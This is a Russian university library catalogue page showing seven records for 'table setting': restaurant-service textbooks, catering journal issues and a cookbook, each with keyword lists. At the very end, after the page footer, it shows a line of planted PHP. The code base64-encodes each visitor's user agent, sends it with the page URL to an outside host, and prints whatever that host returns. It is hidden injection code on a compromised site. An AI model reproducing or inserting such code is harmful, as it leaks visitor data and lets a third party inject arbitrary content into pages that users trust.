Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

288 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СЕРВИРОВКА стола")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Питание и общество. - Журнал, 2009г. № 9
Оглавление 
  • Пасько, О. В. Молекулярная деструктивная кухня / О. В. Пасько, И. Крючкова. - с.2-3
    Кл. слова: ЭМУЛЬСИФИКАЦИЯ, СФЕРИФИКАЦИЯ, ЛЬДОМИКСИНГ
  • Мезенова, Э. Вперед, Россия! Давай, давай! / Э. Мезенова. - с.8-9
    Кл. слова: ДЕЛЬФИЙСКИЕ ИГРЫ
  • Номофилова, Н. Московские мастера`09 / Н. Номофилова. - с.10-11
    Кл. слова: КОНКУРС
  • Нечаева, Г. И снова - "Сладкий май" / Г. Нечаева. - с.12-13
    Кл. слова: КОНДИТЕР, ИСКУССТВО кондитерское
  • Кучер, Л. Оформление стола по заказу гостя / Л. Кучер, Л. Шкуратова. - с.14-15
    Кл. слова: СЕРВИРОВКА СТОЛА
  • Забнев, С. Дегустация эспрессо / С. Забнев. - с.16
  • Сучкова, Е. Уроки кондитера / Е. Сучкова. - с.18
    Кл. слова: ТОРТЫ СВАДЕБНЫЕ
  • Курбанов, Н. Кисломолочные продукты с салепом / Н. Курбанов. - с.23
    Кл. слова: САЛЕП
  • Филонов, М. Салат витаминами богат / М. Филонов. - с.24
    Кл. слова: ЛАТУК
  • Ежевика. - с.25
  • Блохина, И. Чем полезен сыр? И всем ли он полезен? / И. Блохина. - с.30
    Кл. слова: СЫР
2. 
Общепит: бизнес и искусство. - Журнал, 2017г. № 11
Оглавление 
  • Маркелова, А. Закуски к пиву: вкусно, традиционно, оригинально / А. Маркелова. - с.13-16
    Кл. слова: пивные закуски, ассортимент, "пивная тарелка"
  • Фомина, И. Столовые приборы - основа этикета и история произхождения / И. Фомина. - с.17-19
    Кл. слова: общепит, сервировка стола, столовый этикет, предназначение столового прибора
  • Щекина, Ю. Кушать подано! Поехали! / Ю. Щекина. - с.20-25
    Кл. слова: вагон -ресторан, вагон - кафе, питание пассажиров, железнодорожный транспорт, гарантированное питание, ассортиментный перечень блюд
  • Татаев, Н. Современный гость: его вкусы и предпочтения / Н. Татаев. - с.26-29
    Кл. слова: караоке, дизайн заведения, барная карта, сегмент развлечений, индустрия развлечений
  • Третьякова, О. Пирожковые, блинные, пельменные или McDonald's / О. Третьякова. - с.30-32
    Кл. слова: фастфудный бум, русская пища, общепит
Держатели документа (Информация об экземплярах) 
3. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

4. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
5. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
6. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
7. 
Браиловская, Людмила Викторовна. Вечеринки для взрослых "Под знаком зодиака". [Текст] / Л. В. Браиловская, 2003. - 284, [3] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3224 - 07.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.66 с.16 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;